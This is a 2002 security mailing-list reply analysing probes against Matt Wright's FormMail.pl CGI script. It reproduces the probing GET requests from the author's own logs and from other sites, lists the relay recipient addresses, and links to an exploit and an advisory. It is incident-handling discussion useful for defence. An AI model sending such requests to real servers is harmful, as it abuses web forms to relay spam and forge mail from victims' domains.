RE: Matt Wright FormMail Attacks

[Jose Nazario <jose () biocserver BIOC cwru edu>]

On Mon, 14 Jan 2002, Turner, Keith wrote:

>  My guess is one of the following: 1) Someone looking to send spam
> through someone else's webserver. (Seems like that would be very
> inefficient).  2) Someone looking for a new exploit, maybe testing the
> waters for a new worm. 3) Someone looking for a way to "forge" emails.
> make it look like it came from an email address of the affected
> domain.  The email header would go right back to an address in the
> "forged" domain.

my formail attacks have this general structure:

GET
/cgi-bin/formmail.pl?email=someone%40aol%2Ecom&subject=hostname%2Edomain%2Ecom%2Fcgi%2Dbin%2Fformail%2Epl&recipient=c0mik%40hotmail%2Ecom&msg=w00t

recipients have been:

c0mik () hotmail com (msg=w00t)
jersyvips () aol com (again, msg=w00t)
w00tw00t () yahoo com (yet again, msg=w00t)
Heyheyremeberme9 () aol com (msg=w00t)
GUILTYBIZ () aol com (msg=w00t)

i don't know if any of those accounts are valid.

those are just in the past 10,000 lines or so from my error logs (i dont
use FormMail.pl). the use of 'w00t' suggests a younger element (w00t is
L33T and all), doubtful its just simply spam but rather 'hey, this site's
got vulnerable cgi-bin stuff'.

spawn an xterm using formmail:
http://packetstorm.widexs.nl/0007-exploits/formmail-xploit.pl

view env vars using formmail:
http://packetstorm.widexs.nl/advisories/blackwatchlabs/BWL-00-06.txt

but i did find that others have been seeing this same basic pattern:

web logs posted on http://icosym-nt.cvut.cz/musage/A2001-12.txt
/cgi-bin/formmail.pl?email=f2%40aol%2ecom&subject=icosym%2ecvut%2ecz%2fcgi%2dbin%2fformmail%2epl&recipient=nightauditer%40aol%2ecom&msg=w00t
/cgi-bin/formmail.pl?recipient=rmitchell9601 () aol 
com,&subject=are%20you%20interested%20in%20applying%20your%20skills&email=charresonee () bellsouth 
net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl
/cgi-bin/formmail.pl?recipient=rmitchell9601 () aol 
com,&subject=find%20that%20long%20lost%20friend%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.&email=lcordee
 () bellsouth net&=http://icosym-nt.cvut.cz/cgi-bin/formmail.pl

http://www.google.com/search?q=cache:L5KlWd3G3D4C:www.kolobrzeg.pl/stats1169/statslog.20011205+formmail+w00t&hl=en
1Cust129.tnt3.richmond.va.da.uu.net - - [05/Dec/2001:00:10:01 +0100] "GET
/cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Ekolobrzeg%2Epl%2Fcgi%2Dbin%2Fformmail%2Epl&recipient=dreads%40aol%2Ecom&msg=w00t
HTTP/1.1Content-Type: application/x-www-form-urlencoded" 404 190 ""
"Gozilla/4.0 (compatible; MSIE 5.5; windows 2000)"

etc etc ... formmail + w00t on google brings up a bunch. from a few
more lists, more discussion:

http://ntbugtraq.net/archive/107/244789
http://citadelle.intrinsec.com/mailing/current/HTML/ml_mobile_code/0487.html

hope this helps. its a bit older, and not a highly visible item, but its
real.

____________________________
jose nazario                                                 jose () cwru edu
                     PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
                                       PGP key ID 0xFD37F4E5 (pgp.mit.edu)


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com